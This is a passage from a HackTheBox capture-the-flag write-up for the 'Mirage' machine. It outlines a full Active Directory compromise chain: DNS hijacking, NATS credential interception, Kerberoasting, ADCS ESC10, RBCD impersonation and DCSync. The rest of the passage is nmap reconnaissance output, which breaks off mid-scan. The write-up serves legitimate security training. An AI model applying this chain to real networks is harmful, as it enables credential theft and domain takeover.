Mirage
Writeup for HackTheBox Mirage machine
Executive Summary
Mirage is a hard-difficulty Active Directory machine that chains NFS misconfiguration, dynamic DNS abuse, NATS credential interception, ADCS ESC10, and Resource-Based Constrained Delegation to achieve domain compromise.
NFS Share & PDF Intelligence: An anonymous NFS mount of /MirageReports exposes PDF reports revealing that the DNS record for nats-svc.mirage.htb was removed by scavenging — creating an opportunity for DNS hijacking.
DNS Hijacking & NATS MITM: An unsigned dynamic DNS update registers nats-svc pointing to the attacker’s IP. A Python socket proxy on port 4222 forwards traffic to the real NATS server while capturing plaintext credentials (Dev_Account_A).
NATS Stream Replay & Kerberoasting: Authenticated NATS access reveals an auth_logs JetStream containing credentials for david.jjackson. A Kerberoast attack on his session cracks nathan.aadam’s TGS hash.
WinRM & Registry Dump: WinRM as nathan.aadam recovers user.txt. The Winlogon registry key leaks mark.bbond’s auto-login password.
ForceChangePassword & gMSA Read: Mark resets the disabled javier.mmarshall’s password, re-enables the account, and uses its gMSA read permission to extract Mirage-Service$’s NT hash.
ADCS ESC10: Write access to Mirage-Service$ attributes lets Certipy map mark.bbond’s UPN to DC01$, request a certificate as the Domain Controller, then revert the UPN.
RBCD & S4U2Proxy: Using the DC certificate, set_rbcd grants nathan.aadam RBCD rights on DC01$. impacket-getST impersonates Administrator for CIFS/dc01.mirage.htb.
DCSync: The Administrator service ticket enables WinRM, yielding root.txt. impacket-secretsdump dumps all domain credentials.
Reconnaissance
Start off with an Nmap scan.
1
port=$(sudo nmap -p- $IP --min-rate 10000 | grep open | cut -d'/' -f1 | tr '\n' ',' )
1
sudo nmap -sC -sV -vv -p $port $IP -oN mirage.scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
┌──(kali㉿kali)-[/mnt/mirage]
└─$ port=$(sudo nmap -p- $IP --min-rate 10000 | grep open | cut -d'/' -f1 | tr '\n' ',' )
┌──(kali㉿kali)-[/mnt/mirage]
└─$ sudo nmap -sC -sV -vv -p $port $IP -oN mirage.scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 12:13 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:13
Completed NSE at 12:13, 0.00s elapsed
Initiating Ping Scan at 12:13
Scanning 10.129.119.87 [4 ports]
Completed Ping Scan at 12:13, 0.20s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:13
Scanning dc01.mirage.htb (10.129.119.87) [30 ports]
Discovered open port 53/tcp on 10.129.119.87
Discovered open port 445/tcp on 10.129.119.87
Discovered open port 139/tcp on 10.129.119.87
Discovered open port 111/tcp on 10.129.119.87
Discovered open port 56085/tcp on 10.129.119.87
Discovered open port 135/tcp on 10.129.119.87
Discovered open port 5985/tcp on 10.129.119.87
Discovered open port 4222/tcp on 10.129.119.87
Discovered open port 52803/tcp on 10.129.119.87
Discovered open port 56088/tcp on 10.129.119.87
Discovered open port 464/tcp on 10.129.119.87
Discovered open port 56059/tcp on 10.129.119.87
Discovered open port 49664/tcp on 10.129.119.87
Discovered open port 2049/tcp on 10.129.119.87
Discovered open port 49706/tcp on 10.129.119.87
Discovered open port 49665/tcp on 10.129.119.87
Discovered open port 49699/tcp on 10.129.119.87
Discovered open port 49668/tcp on 10.129.119.87
Discovered open port 9389/tcp on 10.129.119.87
Discovered open port 49707/tcp on 10.129.119.87
Discovered open port 88/tcp on 10.129.119.87
Discovered open port 49666/tcp on 10.129.119.87
Discovered open port 593/tcp on 10.129.119.87
Discovered open port 389/tcp on 10.129.119.87
Discovered open port 3269/tcp on 10.129.119.87
Discovered open port 49667/tcp on 10.129.119.87
Discovered open port 3268/tcp on 10.129.119.87
Discovered open port 49722/tcp on 10.129.119.87
Discovered open port 47001/tcp on 10.129.119.87
Discovered open port 636/tcp on 10.129.119.87
Completed SYN Stealth Scan at 12:13, 0.42s elapsed (30 total ports)
Initiating Service scan at 12:13
Scanning 30 services on dc01.mirage.htb (10.129.119.87)
Service scan Timing: About 56.67% done; ETC: 12:15 (0:00:37 remaining)
Completed Service scan at 12:14, 64.62s elapsed (30 services on 1 host)
NSE: Script scanning 10.129.119.87.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 12:14
Completed NSE at 12:14, 12.34s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 12:14
NSE Timing: About 98.36% done; ETC: 12:15 (0:00:01 remaining)
NSE Timing: About 98.36% done; ETC: 12:15 (0:00:01 remaining)
Completed NSE at 12:16, 71.82s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 12:16
Completed NSE at 12:16, 0.00s elapsed
Nmap scan report for dc01.mirage.htb (10.129.119.87)
Host is up, received echo-reply ttl 127 (0.19s latency).
Scanned at 2025-07-20 12:13:34 EDT for 149s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-07-20 17:21:16Z)
111/tcp open rpcbind syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after: 2105-07-04T19:58:41
| MD5: da96:ee88:7537:0dcf:1bd4:4aa3:2104:5393
| SHA-1: c25a:58cc:950f:ce6e:64c7:cd40:e98e:bb5a:653f:b9ff
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after: 2105-07-04T19:58:41
| MD5: da96:ee88:7537:0dcf:1bd4:4aa3:2104:5393
| SHA-1: c25a:58cc:950f:ce6e:64c7:cd40:e98e:bb5a:653f:b9ff
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
2049/tcp open nlockmgr syn-ack ttl 127 1-4 (RPC #100021)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after: 2105-07-04T19:58:41
| MD5: da96:ee88:7537:0dcf:1bd4:4aa3:2104:5393
| SHA-1: c25a:58cc:950f:ce6e:64c7:cd40:e98e:bb5a:653f:b9ff
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Issuer: commonName=mirage-DC01-CA/domainComponent=mirage
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-04T19:58:41
| Not valid after: 2105-07-04T19:58:41
| MD5: da96:ee88:7537:0dcf:1bd4:4aa3:2104:5393
| SHA-1: c25a:58cc:950f:ce6e:64c7:cd40:e98e:bb5a:653f:b9ff
| -----BEGIN CERTIFICATE-----
| MIIF7DCCBNSgAwIBAgITSQAAAAmly5tE1w7/PwABAAAACTANBgkqhkiG9w0BAQsF
| ADBGMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGbWlyYWdl
| MRcwFQYDVQQDEw5taXJhZ2UtREMwMS1DQTAgFw0yNTA3MDQxOTU4NDFaGA8yMTA1
| MDcwNDE5NTg0MVowADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALa/
| UqJSM0syaGI7mm4Lr9IL/U/MhGhXROelD/gGqiTHoDgDAugm6/pqICUKvJJNfX8S
| 5Npt0EGfwOPT4orzfEBneKPwywSRrPw1ciJ2wtGcQnWgMMP8/HdgHyW1Gl2L66Gk
| W2th/k2NzPnTQW2C5bt3/JDjaLYpIYyPdMygLlfHH1LAilEed6ozrRrW08rXvTXM
| xw6AqFYZr0yoE6KDHTO/ZgKcMF7YPDeOaA3c2ldCOYnxuTbI9GPzYzPvdU7cKQFj
| tFL2oce7l8bsPAsyPPoXZrGjxLpyPyQTS1ro0xyrRAze/qlPpcXck8P9Zz8K/n3I
| WPsovpeg2m0lnLa2bmkCAwEAAaOCAxUwggMRMDUGCSsGAQQBgjcVBwQoMCYGHisG
| AQQBgjcVCMjXb5WWb4ShjTGC+KE0g9nnbiwBIQIBbgIBADAyBgNVHSUEKzApBggr
| BgEFBQcDAgYIKwYBBQUHAwEGCisGAQQBgjcUAgIGBysGAQUCAwUwDgYDVR0PAQH/
| BAQDAgWgMEAGCSsGAQQBgjcVCgQzMDEwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwEw
| DAYKKwYBBAGCNxQCAjAJBgcrBgEFAgMFMB0GA1UdDgQWBBT/gvokffsC/s7mtzMs
| 6SqQe6+ThzAfBgNVHSMEGDAWgBTJ+IdMlVv6ldc/u1Z6Kjb0idAthzCBywYDVR0f
| BIHDMIHAMIG9oIG6oIG3hoG0bGRhcDovLy9DTj1taXJhZ2UtREMwMS1DQSgxKSxD
| Tj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
| aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1odGI/Y2VydGlmaWNh
| dGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlv
| blBvaW50MIG/BggrBgEFBQcBAQSBsjCBrzCBrAYIKwYBBQUHMAKGgZ9sZGFwOi8v
| L0NOPW1pcmFnZS1EQzAxLUNBLENOPUFJQSxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2
| aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1pcmFnZSxEQz1o
| dGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25B
| dXRob3JpdHkwMQYDVR0RAQH/BCcwJYIPZGMwMS5taXJhZ2UuaHRiggptaXJhZ2Uu
| aHRiggZNSVJBR0UwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMt
| MS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTEwMDAwDQYJ
| KoZIhvcNAQELBQADggEBAG38vHTJ2FmA2Z/wHABxLDIpQHEns0U2n7SbyGQ//7NQ
| G7buS1JmPLajj4OC0Kzoy7bEbrtcWApVxRwFHoAQHmUH0RlQEhcOxXoWEMLVgTil
| FfP+pf4dWfu4l1cZq/uFguc4nVbNgCkZPZo1bC6s0UJcaM4ylPkPED5L+WWeirFV
| 24r7DPZj4V9UaE1/Hklli6J9RhIU1rTZZHixKDCAGNTIZ5HiaTO6MhmEyS5z2yIY
| C8UJBHDnKSfMZhG+z2VnoRlPK8i0oNg8DL2SzlxmAVjlSdpvz+Q9wTFWhgepH5P8
| rpwi2htMcsDvYoIjkMtm2AjeGJkI1q5Cb2L0f+wl/FU=
|_-----END CERTIFICATE-----
4222/tcp open vrml-multi-use? syn-ack ttl 127
| fingerprint-strings:
| GenericLines:
| INFO {"server_id":"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV","server_name":"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":26,"client_ip":"10.10.14.82","xkey":"XDQ7PLA2MPHDQWMWT4JYEHPIZ3ELXPMGKM37PB7KG5Y54IHX5XVU724R"}
| -ERR 'Authorization Violation'
| GetRequest:
| INFO {"server_id":"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV","server_name":"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":27,"client_ip":"10.10.14.82","xkey":"XDQ7PLA2MPHDQWMWT4JYEHPIZ3ELXPMGKM37PB7KG5Y54IHX5XVU724R"}
| -ERR 'Authorization Violation'
| HTTPOptions:
| INFO {"server_id":"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV","server_name":"NABPKV7U2D5HPEHFAP2T2TL5NZNY2TSOSHXRQLLO6GA7FVHR6NKSYTYV","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":28,"client_ip":"10.10.14.82","xkey":"XDQ7PLA2MPHDQWMWT4JYEHPIZ3ELXPMGKM37PB7KG5Y54IHX5XVU724R"}
| -ERR 'Authorization Violation'
| NULL:
